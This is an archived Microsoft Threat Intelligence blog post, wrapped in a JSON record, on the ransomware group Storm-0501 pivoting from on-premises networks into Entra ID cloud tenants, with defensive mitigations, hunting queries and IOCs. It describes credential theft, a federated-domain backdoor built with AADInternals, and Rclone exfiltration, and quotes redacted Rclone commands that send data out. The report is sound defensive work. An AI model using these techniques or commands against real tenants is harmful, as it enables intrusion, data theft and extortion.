{ "id": "c4c00ab8-900d-4332-95b2-a96de07f68f9", "created_at": "2026-04-06T00:21:43.725095Z", "updated_at": "2026-04-10T03:36:19.226814Z", "deleted_at": null, "sha1_hash": "aa876d3205880558d4244c07bff002c63906d9c8", "title": "Storm-0501: Ransomware attacks expanding to hybrid cloud environments | Microsoft Security Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 322431, "plain_text": "Storm-0501: Ransomware attacks expanding to hybrid cloud\r\nenvironments | Microsoft Security Blog\r\nBy Microsoft Threat Intelligence\r\nPublished: 2024-09-26 · Archived: 2026-04-05 12:45:46 UTC\r\nAugust 27, 2025 update: Storm-0501 has continuously evolved to achieve sharpened focus on cloud-based TTPs as their\r\nprimary objective shifted from deploying on-premises endpoint ransomware to using cloud-based ransomware tactics.\r\nLeveraging cloud-native capabilities, Storm-0501 rapidly exfiltrates large volumes of data, destroys data and backups within\r\nthe victim environment, and demands ransom—all without relying on traditional malware deployment. Read our latest blog\r\non this threat actor: Storm-0501’s evolving techniques lead to cloud-based ransomware.\r\nMicrosoft has observed the threat actor tracked as Storm-0501 launching a multi-staged attack where they compromised\r\nhybrid cloud environments and performed lateral movement from on-premises to cloud environment, leading to data\r\nexfiltration, credential theft, tampering, persistent backdoor access, and ransomware deployment. The said attack targeted\r\nmultiple sectors in the United States, including government, manufacturing, transportation, and law enforcement. Storm-0501 is a financially motivated cybercriminal group that uses commodity and open-source tools to conduct ransomware\r\noperations.\r\nStorm-0501 has been active as early as 2021, initially observed deploying the Sabbath(54bb47h) ransomware in attacks\r\ntargeting US school districts, publicly leaking data for extortion, and even directly messaging school staff and parents. Since\r\nthen, most of the threat actor’s attacks have been opportunistic, as the group began operating as a ransomware-as-a-service\r\n(RaaS) affiliate deploying multiple ransomware payloads developed and maintained by other threat actors over the years,\r\nincluding Hive, BlackCat (ALPHV), Hunters International, LockBit, and most recently, Embargo ransomware. The threat\r\nactor was also recently observed targeting hospitals in the US.\r\nStorm-0501 is the latest threat actor observed to exploit weak credentials and over-privileged accounts to move from\r\norganizations’ on-premises environment to cloud environments. They stole credentials and used them to gain control of the\r\nnetwork, eventually creating persistent backdoor access to the cloud environment and deploying ransomware to the on-premises. Microsoft previously observed threat actors such as Octo Tempest and Manatee Tempest targeting both on-premises and cloud environments and exploiting the interfaces between the environments to achieve their goals.\r\nAs hybrid cloud environments become more prevalent, the challenge of securing resources across multiple platforms grows\r\never more critical for organizations. Microsoft is committed to helping customers understand these attacks and build\r\neffective defenses against them.\r\nIn this blog post, we will go over Storm-0501’s tactics, techniques, and procedures (TTPs), typical attack methods, and\r\nexpansion to the cloud. We will also provide information on how Microsoft detects activities related to this kind of attack, as\r\nwell as provide mitigation guidance to help defenders protect their environment.\r\nFigure 1. Storm-0501 attack chain\r\nAnalysis of the recent Storm-0501 campaign\r\nOn-premises compromise\r\nInitial access and reconnaissance\r\nhttps://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\r\nPage 1 of 9\n\nStorm-0501 previously achieved initial access through intrusions facilitated by access brokers like Storm-0249 and Storm-0900, leveraging possibly stolen compromised credentials to sign in to the target system, or exploiting various known\r\nremote code execution vulnerabilities in unpatched public-facing servers. In a recent campaign, Storm-0501 exploited\r\nknown vulnerabilities in Zoho ManageEngine (CVE-2022-47966), Citrix NetScaler (CVE-2023-4966), and ColdFusion\r\n2016 application (possibly CVE-2023-29300 or CVE-2023-38203). In cases observed by Microsoft, these initial access\r\ntechniques, combined with insufficient operational security practices by the targets, provided the threat actor with\r\nadministrative privileges on the target device.\r\nAfter gaining initial access and code execution capabilities on the affected device in the network, the threat actor performed\r\nextensive discovery to find potential desirable targets such as high-value assets and general domain information like Domain\r\nAdministrator users and domain forest trust. Common native Windows tools and commands, such as systeminfo.exe, net.exe,\r\nnltest.exe, tasklist.exe, were leveraged in this phase. The threat actor also utilized open-source tools like ossec-win32 and\r\nOSQuery to query additional endpoint information. Additionally, in some of the attacks, we observed the threat actor\r\nrunning an obfuscated version of ADRecon.ps1 called obfs.ps1 or recon.ps1 for Active Directory reconnaissance.\r\nFollowing initial access and reconnaissance, the threat actor deployed several remote monitoring and management tools\r\n(RMMs), such as Level.io, AnyDesk, and NinjaOne to interact with the compromised device and maintain persistence.\r\nCredential access and lateral movement\r\nThe threat actor took advantage of admin privileges on the local devices it compromised during initial access and attempted\r\nto gain access to more accounts within the network through several methods. The threat actor primarily utilized Impacket’s\r\nSecretsDump module, which extracts credentials over the network, and leveraged it across an extensive number of devices\r\nto obtain credentials. The threat actor used the compromised credentials to access more devices in the network and then\r\nleveraged Impacket again to collect additional credentials. The threat actor then repeated this process until they\r\ncompromised a large set of credentials that potentially included multiple Domain Admin credentials.\r\nIn addition, the threat actor was observed attempting to gather secrets by reading sensitive files and in some cases gathering\r\nKeePass secrets from the compromised devices. The threat actor used EncryptedStore’s Find-KeePassConfig.ps1\r\nPowerShell script to output the database location and keyfile/user master key information and launch the KeePass\r\nexecutable to gather the credentials. We assess with medium confidence that the threat actor also performed extensive brute\r\nforce activity on a few occasions to gain additional credentials for specific accounts.\r\nThe threat actor was observed leveraging Cobalt Strike to move laterally across the network using the compromised\r\ncredentials and using the tool’s command-and-control (C2) capabilities to directly communicate with the endpoints and send\r\nfurther commands. The common Cobalt Strike Beacon file types used in these campaigns were .dll files and .ocx files that\r\nwere launched by rundll32.exe and regsvr32.exe respectively. Moreover, the “license_id” associated with this Cobalt Strike\r\nBeacon is “666”.  The “license_id” definition is commonly referred to as Watermark and is a nine-digit value that is unique\r\nper legitimate license provided by Cobalt Strike. In this case, the “license_id” was modified with 3-digit unique value in all\r\nthe beacon configurations.\r\nIn cases we observed, the threat actor’s lateral movement across the campaign ended with a Domain Admin compromise and\r\naccess to a Domain Controller that eventually enabled them to deploy ransomware across the devices in the network.\r\nData collection and exfiltration\r\nThe threat actor was observed exfiltrating sensitive data from compromised devices. To exfiltrate data, the threat actor used\r\nthe open-source tool Rclone and renamed it to known Windows binary names or variations of them, such as svhost.exe or\r\nscvhost.exe as masquerading means. The threat actor employed the renamed Rclone binaries to transfer data to the cloud,\r\nusing a dedicated configuration that synchronized files to public cloud storage services such as MegaSync across multiple\r\nthreads. The following are command line examples used by the threat actor in demonstrating this behavior:\r\nSvhost.exe copy –filter-from [REDACTED] [REDACTED] config:[REDACTED] -q –ignore-existing –auto-confirm\r\n–multi-thread-streams 11 –transfers 11\r\nscvhost.exe –config C:WindowsDebuga.conf copy [REDACTED UNC PATH] [REDACTED]\r\nDefense evasion\r\nThe threat actor attempted to evade detection by tampering with security products in some of the devices they got hands-on-keyboard access to. They employed an open-source tool, resorted to PowerShell cmdlets and existing binaries to evade\r\ndetection, and in some cases, distributed Group Policy Object (GPO) policies to tamper with security products.\r\nOn-premises to cloud pivot\r\nIn their recent campaign, we noticed a shift in Storm-0501’s methods. The threat actor used the credentials, specifically\r\nMicrosoft Entra ID (formerly Azure AD), that were stolen from earlier in the attack to move laterally from the on-premises\r\nto the cloud environment and establish persistent access to the target network through a backdoor.\r\nhttps://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\r\nPage 2 of 9\n\nStorm-0501 was observed using the following attack vectors and pivot points on the on-premises side to gain subsequent\r\ncontrol in Microsoft Entra ID:\r\nMicrosoft Entra Connect Sync account compromise\r\nMicrosoft Entra Connect, previously known as Azure AD Connect, is an on-premises Microsoft application that plays a\r\ncritical role in synchronizing passwords and sensitive data between Active Directory (AD) objects and Microsoft Entra ID\r\nobjects. Microsoft Entra Connect synchronizes the on-premises identity and Microsoft Entra identity of a user account to\r\nallow the user to sign in to both realms with the same password. To deploy Microsoft Entra Connect, the application must be\r\ninstalled on an on-premises server or an Azure VM. To decrease the attack surface, Microsoft recommends that\r\norganizations deploy Microsoft Entra Connect on a domain-joined server and restrict administrative access to domain\r\nadministrators or other tightly controlled security groups. Microsoft Incident Response also published recommendations on\r\npreventing cloud identity compromise.\r\nMicrosoft Entra Connect Sync is a component of Microsoft Entra Connect that synchronizes identity data between on-premises environments and Microsoft Entra ID. During the Microsoft Entra Connect installation process, at least two new\r\naccounts (more accounts are created if there are multiple forests) responsible for the synchronization are created, one in the\r\non-premises AD realm and the other in the Microsoft Entra ID tenant. These service accounts are responsible for the\r\nsynchronization process.\r\nThe on-premises account name is prefixed with “MSOL_” and has permissions to replicate directory changes, modify\r\npasswords, modify users, modify groups, and more (see full permissions here).\r\nFigure 2. The on-premises account name\r\nThe cloud Microsoft Entra ID account is prefixed with “sync_\u003cEntra Connect server name\u003e_” and has the account display\r\nname set to “On-Premises Directory Synchronization Service Account”. This user account is assigned with the Directory\r\nSynchronization Accounts role (see detailed permissions of this role here). Microsoft recently implemented a change in\r\nMicrosoft Entra ID that restricts permissions on the Directory Synchronization Accounts (DSA) role in Microsoft Entra\r\nConnect Sync and Microsoft Entra Cloud Sync and helps prevent abuse.\r\nFigure 3. The cloud account name\r\nThe on-premises and cloud service accounts conduct the syncing operation every few minutes, similar to Password Hash\r\nSynchronization (PHS), to uphold real time user experience. Both user accounts mentioned above are crucial for the\r\nMicrosoft Entra Connect Sync service operations and their credentials are saved encrypted via DPAPI (Data Protection API)\r\non the server’s disk or a remote SQL server.\r\nWe can assess with high confidence that in the recent Storm-0501 campaign, the threat actor specifically located Microsoft\r\nEntra Connect Sync servers and managed to extract the plain text credentials of the Microsoft Entra Connect cloud and on-premises sync accounts. We assess that the threat actor was able to achieve this because of the previous malicious activities\r\ndescribed in this blog post, such as using Impacket to steal credentials and DPAPI encryption keys, and tampering with\r\nsecurity products.\r\nFollowing the compromise of the cloud Directory Synchronization Account, the threat actor can authenticate using the clear\r\ntext credentials and get an access token to Microsoft Graph. The compromise of the Microsoft Entra Connect Sync account\r\npresents a high risk to the target, as it can allow the threat actor to set or change Microsoft Entra ID passwords of any hybrid\r\naccount (on-premises account that is synced to Microsoft Entra ID).\r\nCloud session hijacking of on-premises user account\r\nAnother way to pivot from on-premises to Microsoft Entra ID is to gain control of an on-premises user account that has a\r\nrespective user account in the cloud. In some of the Storm-0501 cases we investigated, at least one of the Domain Admin\r\naccounts that was compromised had a respective account in Microsoft Entra ID, with multifactor authentication (MFA)\r\ndisabled, and assigned with a Global Administrator role. It is important to mention that the sync service is unavailable for\r\nadministrative accounts in Microsoft Entra, hence the passwords and other data are not synced from the on-premises account\r\nto the Microsoft Entra account in this case. However, if the passwords for both accounts are the same, or obtainable by on-premises credential theft techniques (i.e. web browsers passwords store), then the pivot is possible.\r\nIf a compromised on-premises user account is not assigned with an administrative role in Microsoft Entra ID and is synced\r\nto the cloud and no security boundaries such as MFA or Conditional Access are set, then the threat actor could escalate to the\r\ncloud through the following:\r\n1. If the password is known, then logging in to Microsoft Entra is possible from any device.\r\nhttps://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\r\nPage 3 of 9\n\n2. If the password is unknown, the threat actor can reset the on-premises user password, and after a few minutes the\r\nnew password will be synced to the cloud.\r\n3. If they hold credentials of a compromised Microsoft Entra Directory Synchronization Account, they can set the cloud\r\npassword using AADInternals’ Set-AADIntUserPassword cmdlet.\r\nIf MFA for that user account is enabled, then authentication with the user will require the threat actor to tamper with the\r\nMFA or gain control of a device owned by the user and subsequently hijack its cloud session or extract its Microsoft Entra\r\naccess tokens along with their MFA claims.\r\nMFA is a security practice that requires users to provide two or more verification factors to gain access to a resource and is a\r\nrecommended security practice for all users, especially for privileged administrators. A lack of MFA or Conditional Access\r\npolicies limiting the sign-in options opens a wide door of possibilities for the attacker to pivot to the cloud environment,\r\nespecially if the user has administrative privileges. To increase the security of admin accounts, Microsoft is rolling out\r\nadditional tenant-level security measures to require MFA for all Azure users.\r\nImpact\r\nCloud compromise leading to backdoor\r\nFollowing a successful pivot from the on-premises environment to the cloud through the compromised Microsoft Entra\r\nConnect Sync user account or the cloud admin account compromised through cloud session hijacking, the threat actor was\r\nable to connect to Microsoft Entra (portal/MS Graph) from any device, using a privileged Microsoft Entra ID account, such\r\nas a Global Administrator, and was no longer limited to the compromised devices.\r\nOnce Global Administrator access is available for Storm-0501, we observed them creating a persistent backdoor access for\r\nlater use by creating a new federated domain in the tenant. This backdoor enables an attacker to sign in as any user of the\r\nMicrosoft Entra ID tenant in hand if the Microsoft Entra ID user property ImmutableId is known or set by the attackers. For\r\nusers that are configured to be synced by the Microsoft Entra Connect service, the ImmutableId property is automatically\r\npopulated, while for users that are not synced the default value is null. However, users with administrative privileges can add\r\nan ImmutableId value, regardless.\r\nThe threat actor used the open-source tool AADInternals, and its Microsoft Entra ID capabilities to create the backdoor.\r\nAADInternals is a PowerShell module designed for security researchers and penetration testers that provides various\r\nmethods for interacting and testing Microsoft Entra ID and is commonly used by Storm-0501. To create the backdoor, the\r\nthreat actor first needed to have a domain of their own that is registered to Microsoft Entra ID. The attacker’s next step is to\r\ndetermine whether the target domain is managed or federated. A federated domain in Microsoft Entra ID is a domain that is\r\nconfigured to use federation technologies, such as Active Directory Federation Services (AD FS), to authenticate users. If\r\nthe target domain is managed, then the attackers need to convert it to a federated one and provide a root certificate to sign\r\nfuture tokens upon user authentication and authorization processes. If the target domain is already federated, then the\r\nattackers need to add the root certificate as “NextSigningCertificate”.\r\nOnce a backdoor domain is available for use, the threat actor creates a federation trust between the compromised tenant, and\r\ntheir own tenant. The threat actor uses the AADInternals commands that enable the creation of Security Assertion Markup\r\nLanguage (SAML or SAML2) tokens, which can be used to impersonate any user in the organization and bypass MFA to\r\nsign in to any application. Microsoft observed the actor using the SAML token sign in to Office 365.\r\nOn-premises compromise leading to ransomware\r\nOnce the threat actor achieved sufficient control over the network, successfully extracted sensitive files, and managed to\r\nmove laterally to the cloud environment, the threat actor then deployed the Embargo ransomware across the organization.\r\nWe observed that the threat actor did not always resort to ransomware distribution, and in some cases only maintained\r\nbackdoor access to the network.\r\nEmbargo ransomware is a new strain developed in Rust, known to use advanced encryption methods. Operating under the\r\nRaaS model, the ransomware group behind Embargo allows affiliates like Storm-0501 to use its platform to launch attacks\r\nin exchange for a share of the ransom. Embargo affiliates employ double extortion tactics, where they first encrypt a victim’s\r\nfiles and threaten to leak stolen sensitive data unless a ransom is paid.\r\nIn the cases observed by Microsoft, the threat actor leveraged compromised Domain Admin accounts to distribute the\r\nEmbargo ransomware via a scheduled task named “SysUpdate” that was registered via GPO on the devices in the network.\r\nThe ransomware binaries names that were used were PostalScanImporter.exe and win.exe. Once the files on the target\r\ndevices were encrypted, the encrypted files extension changed to .partial, .564ba1, and .embargo.\r\nMitigation and protection guidance\r\nMicrosoft recently implemented a change in Microsoft Entra ID that restricts permissions on the Directory Synchronization\r\nAccounts (DSA) role in Microsoft Entra Connect Sync and Microsoft Entra Cloud Sync as part of ongoing security\r\nhttps://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\r\nPage 4 of 9\n\nhardening. This change helps prevent threat actors from abusing Directory Synchronization Accounts in attacks.\r\nCustomers may also refer to Microsoft’s human-operated ransomware overview for general hardening recommendations\r\nagainst ransomware attacks.\r\nThe other techniques used by threat actors and described in this blog can be mitigated by adopting the following security\r\nmeasures:\r\nSecure accounts with credential hygiene: practice the principle of least privilege and audit privileged account activity\r\nin your Microsoft Entra ID environments to slow and stop attackers.\r\nEnable Conditional Access policies – Conditional Access policies are evaluated and enforced every time the user\r\nattempts to sign in. Organizations can protect themselves from attacks that leverage stolen credentials by enabling\r\npolicies such as device compliance or trusted IP address requirements.\r\nSet a Conditional Access policy to limit the access of Microsoft Entra ID sync accounts from untrusted IP\r\naddresses to all cloud apps. The Microsoft Entra ID sync account is identified by having the role ‘Directory\r\nSynchronization Accounts’. Please refer to the Advanced Hunting section and check the relevant query to get\r\nthose IP addresses.\r\nImplement Conditional Access authentication strength to require phishing-resistant authentication for employees and\r\nexternal users for critical apps.\r\nFollow Microsoft’s best practices for securing Active Directory Federation Services.  \r\nRefer to Azure Identity Management and access control security best practices for further steps and recommendations\r\nto manage, design, and secure your Azure AD environment can be found by referring.\r\nEnsure Microsoft Defender for Cloud Apps connectors are turned on for your organization to receive alerts on the\r\nMicrosoft Entra ID sync account and all other users.\r\nEnable protection to prevent by-passing of cloud Microsoft Entra MFA when federated with Microsoft Entra ID.\r\nSet the validatingDomains property of federatedTokenValidationPolicy to “all” to block attempts to sign-in to any\r\nnon-federated domain (like .onmicrosoft.com) with SAML tokens.\r\nTurn on Microsoft Entra ID protection to monitor identity-based risks and create risk-based conditional access\r\npolicies to remediate risky sign-ins.\r\nTurn on tamper protection features to prevent attackers from stopping security services such as Microsoft Defender\r\nfor Endpoint, which can help prevent hybrid cloud environment attacks such as Microsoft Entra Connect abuse.\r\nRefer to the recommendations in our attacker technique profile, including use of Windows Defender Application\r\nControl or AppLocker to create policies to block unapproved information technology (IT) management tools to\r\nprotect against the abuse of legitimate remote management tools like AnyDesk or Level.io.\r\nRun endpoint detection and response (EDR) in block mode so that Defender for Endpoint can block malicious\r\nartifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is\r\nrunning in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.\r\nTurn on investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate\r\naction on alerts to help remediate alerts, significantly reducing alert volume.\r\nDetection details\r\nAlerts with the following names can be in use when investigating the current campaign of Storm-0501.\r\nMicrosoft Defender XDR detections\r\nMicrosoft Defender Antivirus \r\nMicrosoft Defender Antivirus detects the Cobalt Strike Beacon as the following:\r\nBehavior:Win32/CobaltStrike\r\nBackdoor:Win64/CobaltStrike\r\nHackTool:Win64/CobaltStrike\r\nAdditional Cobalt Strike components are detected as the following:\r\nTrojanDropper:PowerShell/Cobacis\r\nTrojan:Win64/TurtleLoader.CS\r\nExploit:Win32/ShellCode.BN\r\nMicrosoft Defender Antivirus detects tools that enable Microsoft Entra ID enumeration as the following malware: \r\nBackdoor:Win32/SuspAadInternalsUsage\r\nEmbargo Ransomware threat components are detected as the following:\r\nRansom:Win32/Embargo\r\nhttps://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\r\nPage 5 of 9\n\nMicrosoft Defender for Endpoint \r\nAlerts with the following titles in the security center can indicate threat activity related to Storm-0501 on your network:\r\nRansomware-linked Storm-0501 threat actor detected\r\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by\r\nunrelated threat activity and are not monitored in the status cards provided with this report. \r\nPossible Adobe ColdFusion vulnerability exploitation\r\nCompromised account conducting hands-on-keyboard attack\r\nOngoing hands-on-keyboard attacker activity detected (Cobalt Strike)\r\nOngoing hands-on-keyboard attack via Impacket toolkit\r\nSuspicious Microsoft Defender Antivirus exclusion\r\nAttempt to turn off Microsoft Defender Antivirus protection\r\nRenaming of legitimate tools for possible data exfiltration\r\nBlackCat ransomware\r\n‘Embargo’ ransomware was detected and was active\r\nSuspicious Group Policy action detected\r\nAn active ‘Embargo’ ransomware was detected\r\nThe following alerts might indicate on-premises to cloud pivot through Microsoft Entra Connect:\r\nEntra Connect Sync credentials extraction attempt\r\nSuspicious cmdlets launch using AADInternals\r\nPotential Entra Connect Tampering\r\nIndication of local security authority secrets theft\r\nMicrosoft Defender for Identity\r\nThe following Microsoft Defender for Identity alerts can indicate activity related to this threat:\r\nData exfiltration over SMB\r\nSuspected DCSync attack\r\nMicrosoft Defender for Cloud Apps\r\nMicrosoft Defender for Cloud Apps can detect abuse of permissions in Microsoft Entra ID and other cloud apps. Activities\r\nrelated to the Storm-0501 campaign described in this blog are detected as the following:\r\nBackdoor creation using AADInternals tool\r\nCompromised Microsoft Entra ID Cloud Sync account\r\nSuspicious sign-in to Microsoft Entra Connect Sync account\r\nEntra Connect Sync account suspicious activity following a suspicious login\r\nAADInternals tool used by a Microsoft Entra Sync account\r\nSuspicious login from AADInternals tool\r\nMicrosoft Defender Vulnerability Management\r\nMicrosoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in\r\nthis threat:\r\nCVE-2022-47966\r\nThreat intelligence reports \r\nMicrosoft customers can use the following reports in Microsoft Defender Threat Intelligence to get the most up-to-date\r\ninformation about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the\r\nintelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in\r\ncustomer environments: \r\nStorm-0501\r\nAdvanced hunting \r\nMicrosoft Defender XDR\r\nMicrosoft Defender XDR customers can run the following query to find related activity in their networks:\r\nhttps://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\r\nPage 6 of 9\n\nMicrosoft Entra Connect Sync account exploration\r\nExplore sign-in activity from IdentityLogonEvents, look for uncommon behavior, such as sign-ins from newly seen IP\r\naddresses or sign-ins to new applications that are non-sync related.\r\nIdentityLogonEvents\r\n| where Timestamp \u003e ago(30d)\r\n| where AccountDisplayName contains \"On-Premises Directory Synchronization Service Account\"\r\n| extend ApplicationName = tostring(RawEventData.ApplicationName)\r\n| project-reorder Timestamp, AccountDisplayName, AccountObjectId, IPAddress, ActionType, ApplicationName,\r\nOSPlatform, DeviceType\r\nUsually, the activity of the sync account is repetitive, coming from the same IP address to the same application, any\r\ndeviation from the natural flow is worth investigating. Cloud applications that normally accessed by the Microsoft Entra ID\r\nsync account are “Microsoft Azure Active Directory Connect”, “Windows Azure Active Directory”, “Microsoft Online\r\nSyndication Partner Portal”\r\nExplore the cloud activity (a.k.a ActionType) of the sync account, same as above, this account by nature performs a certain\r\nset of actions including ‘update User.’, ‘update Device.’ and so on. New and uncommon activity from this user might\r\nindicate an interactive use of the account, even though it could have been from someone inside the organization it could also\r\nbe the threat actor.\r\nCloudAppEvents\r\n| where Timestamp \u003e ago(30d)\r\n| where AccountDisplayName has \"On-Premises Directory Synchronization Service Account\"\r\n| extend Workload = RawEventData.Workload\r\n| project-reorder Timestamp, IPAddress, AccountObjectId, ActionType, Application, Workload, DeviceType,\r\nOSPlatform, UserAgent, ISP\r\nPay close attention to action from different DeviceTypes or OSPlatforms, this account automated service is performed from\r\none specific machine, so there shouldn’t be any variety in these fields.\r\nCheck which IP addresses Microsoft Entra Connect Sync account uses\r\nThis query reveals all IP addresses that the default Microsoft Entra Connect Sync account uses so those could be added as\r\ntrusted IP addresses for the Entra ID sync account (make sure the account is not compromised before relying on this list)\r\nIdentityLogonEvents\r\n| where AccountDisplayName has \"On-Premises Directory Synchronization Service Account\"\r\n| where ActionType == \"LogonSuccess\"\r\n| distinct IPAddress\r\n| union (CloudAppEvents\r\n| where AccountDisplayName has \"On-Premises Directory Synchronization Service Account\"\r\n| distinct IPAddress)\r\n| distinct IPAddress\r\nFederation and authentication domain changes\r\nExplore the addition of a new authentication or federation domain, validate that the new domain is valid one and was\r\npurposefully added\r\nCloudAppEvents\r\n| where Timestamp \u003e ago(30d)\r\n| where ActionType in (\"Set domain authentication.\", \"Set federation settings on domain.\")\r\nMicrosoft Sentinel\r\nhttps://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\r\nPage 7 of 9\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to\r\nautomatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map\r\nanalytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel\r\nContent Hub to have the analytics rule deployed in their Sentinel workspace.\r\nAssess your environment for Manage Engine, Netscaler, and ColdFusion vulnerabilities.\r\nDeviceTvmSoftwareVulnerabilities\r\n| where CveId in (\"CVE-2022-47966\",\"CVE-2023-4966\",\"CVE-2023-29300\",\"CVE-2023-38203\")\r\n| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,\r\nCveId,VulnerabilitySeverityLevel\r\n| join kind=inner ( DeviceTvmSoftwareVulnerabilitiesKB | project CveId,\r\nCvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware\r\n) on CveId\r\n| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,\r\nCveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware\r\nSearch for file IOC\r\nlet selectedTimestamp = datetime(2024-09-17T00:00:00.0000000Z);\r\nlet fileName =\r\ndynamic([\"PostalScanImporter.exe\",\"win.exe\",\"name.dll\",\"248.dll\",\"cs240.dll\",\"fel.ocx\",\"theme.ocx\",\"hana.ocx\",\"obfs.ps1\",\"recon.ps1\"]);\r\nlet FileSHA256 =\r\ndynamic([\"efb2f6452d7b0a63f6f2f4d8db49433259249df598391dd79f64df1ee3880a8d\",\"a9aeb861817f3e4e74134622cbe298909e28d0fcc1e72f179a32adc63729\r\nsearch in\r\n(AlertEvidence,BehaviorEntities,CommonSecurityLog,DeviceBaselineComplianceProfiles,DeviceEvents,DeviceFileEvents,DeviceImageLoadEvents,\r\nDeviceLogonEvents,DeviceNetworkEvents,DeviceProcessEvents,DeviceRegistryEvents,DeviceFileCertificateInfo,DynamicEventCollection,EmailAtta\r\nTimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d)) // from September 17th runs the\r\nsearch for 90 days, change the selectedTimestamp accordingly. and (FileName in (fileName) or OldFileName in\r\n(fileName) or ProfileName in (fileName) or InitiatingProcessFileName in (fileName) or\r\nInitiatingProcessParentFileName in (fileName) or InitiatingProcessVersionInfoInternalFileName in (fileName)\r\nor InitiatingProcessVersionInfoOriginalFileName in (fileName) or PreviousFileName in (fileName) or\r\nProcessVersionInfoInternalFileName in (fileName) or ProcessVersionInfoOriginalFileName in (fileName) or\r\nDestinationFileName in (fileName) or SourceFileName in (fileName)or ServiceFileName in (fileName) or SHA256 in\r\n(FileSHA256) or InitiatingProcessSHA256 in (FileSHA256))\r\nMicrosoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post\r\nexploitation activity detailed in this blog, in addition to Microsoft Defender XDR detections list above.\r\nRemote Management Monitoring Network Connections\r\nLevel.io RMM File Signature\r\nAnyDesk RMM File Signature\r\nNinjaOne RMM File Signature\r\nPotential Impacket Execution\r\nPotential ransomware activity related to Cobalt Strike\r\nCobalt DNS Beacon\r\nC2-NamedPipe\r\nRenamed Rclone Exfiltration\r\nDisable Or Modify Windows Defender\r\nClearing of forensic evidence from event logs using wevtutil\r\nSuspicious Signin By AAD Connect Account\r\nIndicators of compromise (IOCs)\r\nThe following list provides indicators of compromise (IOCs) observed during our investigation. We encourage our\r\ncustomers to investigate these indicators within their environments and implement detections and protections to identify any\r\npast related activity and prevent future attacks against their systems.\r\nFile name SHA-256 Description\r\nhttps://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\r\nPage 8 of 9\n\nPostalScanImporter.exe,\r\nwin.exe\r\nefb2f6452d7b0a63f6f2f4d8db49433259249df598391dd79f64df1ee3880a8d\r\nEmbargo\r\nransomware\r\nwin.exe a9aeb861817f3e4e74134622cbe298909e28d0fcc1e72f179a32adc637293a40\r\nEmbargo\r\nransomware\r\nname.dll caa21a8f13a0b77ff5808ad7725ff3af9b74ce5b67426c84538b8fa43820a031\r\nCobalt\r\nStrike\r\n248.dll d37dc37fdcebbe0d265b8afad24198998ae8c3b2c6603a9258200ea8a1bd7b4a\r\nCobalt\r\nStrike\r\ncs240.dll 53e2dec3e16a0ff000a8c8c279eeeca8b4437edb8ec8462bfbd9f64ded8072d9\r\nCobalt\r\nStrike\r\nfel.ocx 827f7178802b2e92988d7cff349648f334bc86317b0b628f4bb9264285fccf5f\r\nCobalt\r\nStrike\r\ntheme.ocx ee80f3e3ad43a283cbc83992e235e4c1b03ff3437c880be02ab1d15d92a8348a\r\nCobalt\r\nStrike\r\nhana.ocx de09ec092b11a1396613846f6b082e1e1ee16ea270c895ec6e4f553a13716304\r\nCobalt\r\nStrike\r\nobfs.ps1 d065623a7d943c6e5a20ca9667aa3c41e639e153600e26ca0af5d7c643384670 ADRecon\r\nrecon.ps1 c08dd490860b54ae20fa9090274da9ffa1ba163f00d1e462e913cf8c68c11ac1 ADRecon\r\nReferences\r\nThe Rust Revolution: New Embargo Ransomware Steps In – Cyble\r\nEmbargo Ransomware Group: The Interview (suspectfile.com)\r\nhttps://aadinternals.com/post/aadbackdoor/\r\nhttps://aadinternals.com/post/aad-deepdive/\r\nOmri Refaeli, Tafat Gaspar, Vaibhav Deshmukh, Naya Hashem, Charles-Edouard Bettan\r\nMicrosoft Threat Intelligence Community\r\nLearn more\r\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat\r\nIntelligence Blog: https://aka.ms/threatintelblog.\r\nTo get notified about new publications and to join discussions on social media, follow us on LinkedIn at\r\nhttps://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter)\r\nat https://twitter.com/MsftSecIntel.\r\nTo hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape,\r\nlisten to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.\r\nSource: https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\r\nhttps://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\r\nPage 9 of 9", "extraction_quality": 1, 